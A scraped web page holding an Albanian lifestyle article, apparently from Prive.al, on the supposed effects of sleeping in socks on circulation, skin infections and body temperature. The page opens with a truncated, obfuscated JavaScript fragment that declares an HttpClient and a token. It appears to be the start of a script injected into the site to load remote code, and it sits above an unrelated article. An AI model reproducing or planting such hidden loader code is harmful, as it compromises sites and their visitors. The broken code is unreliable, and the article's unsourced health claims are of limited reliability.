;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Çfarë mund t’iu ndodhë nëse natën flini me çorape veshur?

By

Kur bëhet fjalë për të veshur çorape në shtrat, gjithçka varet nga preferencat tona personale. Disa njerëz nuk mund të bien në gjumë nëse nuk i kanë veshur çorapet e tyre të ngrohta, dhe të tjerë nuk mund të durojnë mendimin e djersitjes gjatë natës dhe shkojnë në shtrat zbathur. Por siç rezulton, gjumi me çorape mund të ketë disa pasoja jo të këndshme dhe ju ftojmë të lexoni më tutje për ta kuptuar pse.

  1. Nëse mund të ndikojë në qarkullimin tuaj të gjakut.

Nuk ka dyshim që veshja e çorapeve në shtrat është e ngrohtë dhe komode dhe madje mund të rrisë përkohësisht qarkullimin e gjakut. Por nëse mbani çorapet tuaja për një periudhë të gjatë kohore, ajo në fakt fillon të funksionojë anasjelltas, duke ulur rrjedhën tuaj të gjakut. Nëse e keni zakon të vishni çorape gjatë natës, në planin afatgjatë, mund të shkaktojë ngadalësimin e rrjedhjes së gjakut.

  1. Mund të keni një rrezik më të lartë të infeksioneve të lëkurës.

Çorapet tuaja të preferuara me dizajne qesharake mund t’ju bëjnë të qeshni dhe t’ju ngritin humorin, edhe në një ditë të zymtë, por kushtojini vëmendje pëlhurës nga e cila janë bërë.

Materialet sintetike, të tilla si poliesteri, pëlhura prej fije artificiale ose najloni, nuk janë miqësore me lëkurën dhe nuk i lënë këmbët tuaja të marrin frymë. Djersitjet e natës janë mjaft të zakonshme dhe nëse flini nën një batanije të rëndë, mjedisi i lagësht dhe i ngrohtë krijon një terren të përsosur për bakteret që mund të prekin këmbët tuaja.

Nëse disa kimikate të forta, të tilla si ngjyra dhe rrëshira, janë përdorur për të trajtuar çorapet tuaja, shanset janë që mund të keni acarim dhe skuqje, të njohura gjithashtu si dermatiti i shkaktuar nga rrobat.

  1. Mund të ndikojë në temperaturën e trupit tuaj.

Kur jeni duke pushuar natën, trupi juaj vazhdon të punojë, dhe në fakt ka shumë gjëra që ndodhin gjatë gjumit. Temperatura e trupit tuaj ndryshon disa herë gjatë natës dhe ne flemë më mirë kur jemi më të freskët. Nëse vishni çorape që nuk janë prej pëlhurash që marrin frymë, temperatura e trupit tuaj mund të rritet, duke ju shqetësuar gjumin. /Prive.al

Artikuj të ngjashëm